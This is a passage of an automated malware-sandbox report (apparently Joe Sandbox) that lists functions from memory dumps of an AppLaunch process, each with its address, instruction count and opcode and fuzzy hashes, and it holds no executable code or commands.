                                                                                                                                    • Opcode ID: fa33c34b46e387640f84adedd772d49db09d07de6fd927024c4d786d21830307
                                                                                                                                    • Instruction ID: b5897ff62fb84a4678ef12106d6be9736a1c33848ab4c88d251e0586b152d258
                                                                                                                                    • Opcode Fuzzy Hash: fa33c34b46e387640f84adedd772d49db09d07de6fd927024c4d786d21830307
                                                                                                                                    • Instruction Fuzzy Hash: A7210771504240DFDB00CF10D5C4B2ABBA6FB84324F24C969D9094F746CB76F866CEA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564B472, Relevance: .1, Instructions: 71COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 29ef6f0d250f954f686004cb4efc8a04d50add998d00117fe416d7a9e4b47912
                                                                                                                                    • Instruction ID: 0bda61ad86b93a76dd538e4148acf160c6f9dc574952f76aad6ee3bdcaf3dd03
                                                                                                                                    • Opcode Fuzzy Hash: 29ef6f0d250f954f686004cb4efc8a04d50add998d00117fe416d7a9e4b47912
                                                                                                                                    • Instruction Fuzzy Hash: E7218E7170839ACBCB299B31E41A63A7BA7BB42711704456DE34786A51DB38CD02CF57
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564A558, Relevance: .1, Instructions: 65COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d519498a7c05389517dca8a0552522516a2f316d19520c068db577c67974b49b
                                                                                                                                    • Instruction ID: 3a820c4b51329acbf807032756626457d1ab8acc2afbbdb1e8d1e309c004ecdb
                                                                                                                                    • Opcode Fuzzy Hash: d519498a7c05389517dca8a0552522516a2f316d19520c068db577c67974b49b
                                                                                                                                    • Instruction Fuzzy Hash: 5E110A31B052046FD714A7749825BAE3BB79F85600F508465E605DF3D1DF348D068BE2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 056430C7, Relevance: .1, Instructions: 64COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7f7c1d2fe91725621ed9142d6f36951c1a9d7eb37a3c537b7f9855d6f8134c39
                                                                                                                                    • Instruction ID: a773ae5389daa7cd0f8e6bb6b33cb9018dd8496e619364ec67b99e7715bff20e
                                                                                                                                    • Opcode Fuzzy Hash: 7f7c1d2fe91725621ed9142d6f36951c1a9d7eb37a3c537b7f9855d6f8134c39
                                                                                                                                    • Instruction Fuzzy Hash: DE1127303083166FD3205B65D818AA7BBDADF81254F044C2DE14AC7781CBB558458FB2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564B940, Relevance: .1, Instructions: 60COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 35c1fc4e7ab62902adec079dc2e7eb2e83a3709ce1a3a730bbaea336e3839c03
                                                                                                                                    • Instruction ID: 1ae4b675c4072f8a6bef1eb34fe61036cbd3e6bc1a73fe9c6d83d19ff74cda82
                                                                                                                                    • Opcode Fuzzy Hash: 35c1fc4e7ab62902adec079dc2e7eb2e83a3709ce1a3a730bbaea336e3839c03
                                                                                                                                    • Instruction Fuzzy Hash: F6113A34B00A1BABCB00EF24D451A5EB7B6BFC4604B644D29D1059B664DF70BD0A8BE5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564CD02, Relevance: .1, Instructions: 59COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: da3deec39fcf4369d37bb25e58725b5732cbf987a738216c6c2076917e6a12a4
                                                                                                                                    • Instruction ID: 24db1d08889f9b4f66952863fa15018cb71630590f85dc631df351dea7569081
                                                                                                                                    • Opcode Fuzzy Hash: da3deec39fcf4369d37bb25e58725b5732cbf987a738216c6c2076917e6a12a4
                                                                                                                                    • Instruction Fuzzy Hash: 5911BC383003049FC7249BB4A85962A7BE7FFC5315B14482DD6038B790CAB1AC45CBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05643F4A, Relevance: .1, Instructions: 58COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b7e1325eb3cce69f010e137efe1ce94f196c604b9075fb196888faa6a67ec68b
                                                                                                                                    • Instruction ID: 29ea73b2b9e571b0e034859792a0ccf313ee7431697b28939f8b36f8a388dd7d
                                                                                                                                    • Opcode Fuzzy Hash: b7e1325eb3cce69f010e137efe1ce94f196c604b9075fb196888faa6a67ec68b
                                                                                                                                    • Instruction Fuzzy Hash: 0F11C2343056572F8751A730A46847E7BA7EFD21083194D6CE606CF684DE246D4A4BF7
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0522D4D7, Relevance: .1, Instructions: 56COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733259908.000000000522D000.00000040.00000001.sdmp, Offset: 0522D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_522d000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 14f94134bb014abb579cfd279659e17573a78b517b5aeb89abd8cbe1213a7701
                                                                                                                                    • Instruction ID: 223442aeaf8a1a0258b9c48ba8173f65c54e1ab579e68fda8ceef1a3c5ae4a9c
                                                                                                                                    • Opcode Fuzzy Hash: 14f94134bb014abb579cfd279659e17573a78b517b5aeb89abd8cbe1213a7701
                                                                                                                                    • Instruction Fuzzy Hash: D711AF76404280DFCB11CF10D5C4B16BF72FB84324F28C6ADD8094B656C37AD46ACBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0534D59F, Relevance: .1, Instructions: 53COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733366260.000000000534D000.00000040.00000001.sdmp, Offset: 0534D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_534d000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cc16c29598044954f4980a0c83147da8b9812f1b5fa16f843667af26126a180b
                                                                                                                                    • Instruction ID: 84da83a8b12be78afd541efcf16c3855000e3c801885b0397764d497c611b4cb
                                                                                                                                    • Opcode Fuzzy Hash: cc16c29598044954f4980a0c83147da8b9812f1b5fa16f843667af26126a180b
                                                                                                                                    • Instruction Fuzzy Hash: AB11DD75504284CFCB01CF10D6D4B25BBA2FB84324F28CAAAD8494B656C37AE45ACF62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0534D3EF, Relevance: .1, Instructions: 53COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733366260.000000000534D000.00000040.00000001.sdmp, Offset: 0534D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_534d000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 99dbaf5a636171ca4adb3990e2ab7dfb8a4f759d7c9c683206bac86f4549adf7
                                                                                                                                    • Instruction ID: ce029e9a025d526fa9dda0191aa7aa81c915811e3d35f902206deb4bf3867c6f
                                                                                                                                    • Opcode Fuzzy Hash: 99dbaf5a636171ca4adb3990e2ab7dfb8a4f759d7c9c683206bac86f4549adf7
                                                                                                                                    • Instruction Fuzzy Hash: 63116075504280DFDB11CF14D5C4B19BBA2FB84324F28C6A9D8494F746C37AE45ACF92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564F338, Relevance: .1, Instructions: 52COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b081b57e614a1c9ac243718997f5cca9600ff6d14d01250f4a1c056114119062
                                                                                                                                    • Instruction ID: bd687a00f35ad7d5078979f971c65109a18b496efa84bc23d0b9a77a4691ac64
                                                                                                                                    • Opcode Fuzzy Hash: b081b57e614a1c9ac243718997f5cca9600ff6d14d01250f4a1c056114119062
                                                                                                                                    • Instruction Fuzzy Hash: E0115335A042108FCB14DFA9D888E6ABBB9FF4961071600A9E805DB372C770EC40CFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564CD10, Relevance: .1, Instructions: 51COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b180ec3c94b265fc2df92bbb7fc005dc21bfd71f2e4d14f6fa1f76b09d5ac93e
                                                                                                                                    • Instruction ID: f6fcc4041ed75a783d1b3082975055d228b6c8550190a1c2e27e34ff943e9949
                                                                                                                                    • Opcode Fuzzy Hash: b180ec3c94b265fc2df92bbb7fc005dc21bfd71f2e4d14f6fa1f76b09d5ac93e
                                                                                                                                    • Instruction Fuzzy Hash: 65018B343003149FC7249BB5A85872AB7E7FBC5319B244C2CD7038B780CEB1AC458BA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05647288, Relevance: .0, Instructions: 50COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 16f5831f691e3ecd1367ca87c27db4908dda0847c7fb6de580a5829bba3f8e41
                                                                                                                                    • Instruction ID: 26826a16c536d2b3ac3238fdfa079a0d9763928c375af4cce21b74914f3b1b83
                                                                                                                                    • Opcode Fuzzy Hash: 16f5831f691e3ecd1367ca87c27db4908dda0847c7fb6de580a5829bba3f8e41
                                                                                                                                    • Instruction Fuzzy Hash: 6201F93470E3465FC716973498245AA7FB69F8210531444EAE805C7392DE358D02CF62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564C480, Relevance: .0, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b7b2a0a17386a1631974fa3de0ceee53266e972814d91489226ab065c0011d13
                                                                                                                                    • Instruction ID: 03b9993c292297ac7e1f853dd1ef6735f312cb8d9bc1bd14acd5a28fe7efbbb2
                                                                                                                                    • Opcode Fuzzy Hash: b7b2a0a17386a1631974fa3de0ceee53266e972814d91489226ab065c0011d13
                                                                                                                                    • Instruction Fuzzy Hash: 07019E343046058FC714CB25D544CAABBF6FF8561535685AAE506CB721EBB0ED01CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564B92F, Relevance: .0, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fef5f5613364ad36e34c10a2e6133035ce98404099fec2b7ede7f294b43cd4bb
                                                                                                                                    • Instruction ID: a89963cf925dcfd2282033e4d3c5621852015ba6e322b2cd008e7210f1aa3713
                                                                                                                                    • Opcode Fuzzy Hash: fef5f5613364ad36e34c10a2e6133035ce98404099fec2b7ede7f294b43cd4bb
                                                                                                                                    • Instruction Fuzzy Hash: 85019E31A00616AFCB00EF24D852A9EBBF6FFC12147150929D5419B660EB34B90ACBE2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05643F58, Relevance: .0, Instructions: 46COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bede9fe1c68a4c0d2339673cfed069466645a050822b94bdbec619445209cf88
                                                                                                                                    • Instruction ID: 20ca740a4414b2b05504feeabefc2edd2b791e33d08b4965314830db2dfd95e7
                                                                                                                                    • Opcode Fuzzy Hash: bede9fe1c68a4c0d2339673cfed069466645a050822b94bdbec619445209cf88
                                                                                                                                    • Instruction Fuzzy Hash: 9E01BC343106175B8A94A730E1A803E73A3EFD16183694D2CE60BCB644DE347D0A4FE6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05644057, Relevance: .0, Instructions: 41COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 275cdfeb7049269a4f24973813d4c8510ba57450afcc4108ba8dd8e4121c5785
                                                                                                                                    • Instruction ID: e23b3b6e208c7067a3a16eb291742719f0876f247160927f6577407a4f5a6812
                                                                                                                                    • Opcode Fuzzy Hash: 275cdfeb7049269a4f24973813d4c8510ba57450afcc4108ba8dd8e4121c5785
                                                                                                                                    • Instruction Fuzzy Hash: 6901F230505B099FDB25CF32E91995ABFF6FF88301700866EE84A83A51CB746546CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564C4F4, Relevance: .0, Instructions: 40COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: dd7a6f367620ebd737d99760ae5552d4d41ad361af961e3f8ef85076705f7add
                                                                                                                                    • Instruction ID: ddc82a0f4e9cc6c26309ed19478399b4ce184d54fdc0ca0b716e764d4e408f48
                                                                                                                                    • Opcode Fuzzy Hash: dd7a6f367620ebd737d99760ae5552d4d41ad361af961e3f8ef85076705f7add
                                                                                                                                    • Instruction Fuzzy Hash: B6F044313095458FE301CB24D4548B97BA2FF91281709C0AAE402CF771EB74EC42CB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05643060, Relevance: .0, Instructions: 40COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cfcaca87205fad797b2d03acbb79bff7e465b7bb3608c88d7b62b24fb7ca9323
                                                                                                                                    • Instruction ID: ac616e3ba7b9d8c5844384fa26c6edecab9fa09f6409871bef62896389c124ce
                                                                                                                                    • Opcode Fuzzy Hash: cfcaca87205fad797b2d03acbb79bff7e465b7bb3608c88d7b62b24fb7ca9323
                                                                                                                                    • Instruction Fuzzy Hash: 3AF0F62120E3A62FC717263578748DA3FA69E8665474900A7E685CF143CE45090587B7
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05643239, Relevance: .0, Instructions: 39COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cc465a73c27b7d80febf7a774eb6c9d33e5dc466c60829d5a2271b145dbac066
                                                                                                                                    • Instruction ID: 49d9148b2c3e9b60ff090a65f2209aa4687308b6b506e1bd8e1d9cb8332b2b8a
                                                                                                                                    • Opcode Fuzzy Hash: cc465a73c27b7d80febf7a774eb6c9d33e5dc466c60829d5a2271b145dbac066
                                                                                                                                    • Instruction Fuzzy Hash: 79014F34A1524EAFCB50EBB8E55689D7FB1EF85208B5408A9D905D7350DE345F08CFA3
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05647FA4, Relevance: .0, Instructions: 38COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f16057470852887ab60349848769c08c040b18238c5c32d39c4186e4d84d28b2
                                                                                                                                    • Instruction ID: b6702897e1859ddfab2ac876cc302056fb10420056ac649f9bd9cca2a0c0b96a
                                                                                                                                    • Opcode Fuzzy Hash: f16057470852887ab60349848769c08c040b18238c5c32d39c4186e4d84d28b2
                                                                                                                                    • Instruction Fuzzy Hash: 0BF0FC3460CB514FC351DB75A4414567F91DD816413988D6DC1468E720DF74A60BDB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564B800, Relevance: .0, Instructions: 38COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9a1bd603828a3b1b72f06a4ef4a614898efe4660c879ad0313009ff74d3c9c4e
                                                                                                                                    • Instruction ID: 8200a53e26fd9ba56c58c845eb611da91712b875d1c8baafde6249f5081fa2b4
                                                                                                                                    • Opcode Fuzzy Hash: 9a1bd603828a3b1b72f06a4ef4a614898efe4660c879ad0313009ff74d3c9c4e
                                                                                                                                    • Instruction Fuzzy Hash: 84014630A00319DFCB54DFA9E8145DEBBF5FF88611B04462AEA4AE3200DB746A45CFD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564D70F, Relevance: .0, Instructions: 37COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 12e4d09288f21b6b209506db1fff8079081d130b9328c7df4656d4beaad67a5a
                                                                                                                                    • Instruction ID: a65cbe03510953ea0b8347e1b2a781627f1510c91a599f2ef23d1d872fcc776f
                                                                                                                                    • Opcode Fuzzy Hash: 12e4d09288f21b6b209506db1fff8079081d130b9328c7df4656d4beaad67a5a
                                                                                                                                    • Instruction Fuzzy Hash: 49F0F032A093045FC3149A25D854AABFBAAEFC5220F15407AD50A87261EBB09844CBE1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05643859, Relevance: .0, Instructions: 37COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 151a705fd6e5de656a3b4cca511406036b43a28d129d550997ea96f117bad6af
                                                                                                                                    • Instruction ID: 193623b9860cb9f846f0af6a3c87678f10528b3bea2268451463f8195bfd7e1e
                                                                                                                                    • Opcode Fuzzy Hash: 151a705fd6e5de656a3b4cca511406036b43a28d129d550997ea96f117bad6af
                                                                                                                                    • Instruction Fuzzy Hash: 80F0BB3170C1695FDB45D668A8206E97FE5DB85224F194097E009D77C1DA35C942CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0522DAC8, Relevance: .0, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733259908.000000000522D000.00000040.00000001.sdmp, Offset: 0522D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_522d000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0e190557d2fb864e8726d8a9bf5ffd718b3c1b2832103b7d1a903c2aa6b9e2e8
                                                                                                                                    • Instruction ID: ec83ea24bba7c74d0887607f12232c70a650f6d6047df2394f516529e2f9d504
                                                                                                                                    • Opcode Fuzzy Hash: 0e190557d2fb864e8726d8a9bf5ffd718b3c1b2832103b7d1a903c2aa6b9e2e8
                                                                                                                                    • Instruction Fuzzy Hash: F4F06876404254AFE7108E16DD84B62FF98EF41634F18C55AED085B646C3755845CAB1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05645EF9, Relevance: .0, Instructions: 35COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cf70af389d3e268df440d00f5f115d7653f7878faa3ab94250ed55905ee0ff9b
                                                                                                                                    • Instruction ID: 3bb5355d54ca1097035b71c13658e52edc04bef0f1b600e95f75b11a5879a033
                                                                                                                                    • Opcode Fuzzy Hash: cf70af389d3e268df440d00f5f115d7653f7878faa3ab94250ed55905ee0ff9b
                                                                                                                                    • Instruction Fuzzy Hash: CCF0B43050A34DAFC751DF70E91299A7F7A9F82204B5548D6D509DB252DE351E08CBA3
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05640A23, Relevance: .0, Instructions: 34COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 74663d8589ffb4f6d1d67187f39986e563554012ef09eabfe2c7a24efed28433
                                                                                                                                    • Instruction ID: a0467df697b69305ae4eeb37c05d72e6829d35490f324a2ff986f96f7c9d2904
                                                                                                                                    • Opcode Fuzzy Hash: 74663d8589ffb4f6d1d67187f39986e563554012ef09eabfe2c7a24efed28433
                                                                                                                                    • Instruction Fuzzy Hash: 97F0EC35E112559F8B44EFB8E5051AE7BB5FF48260B504065E91AEB350EF346E01CFD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564D430, Relevance: .0, Instructions: 34COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
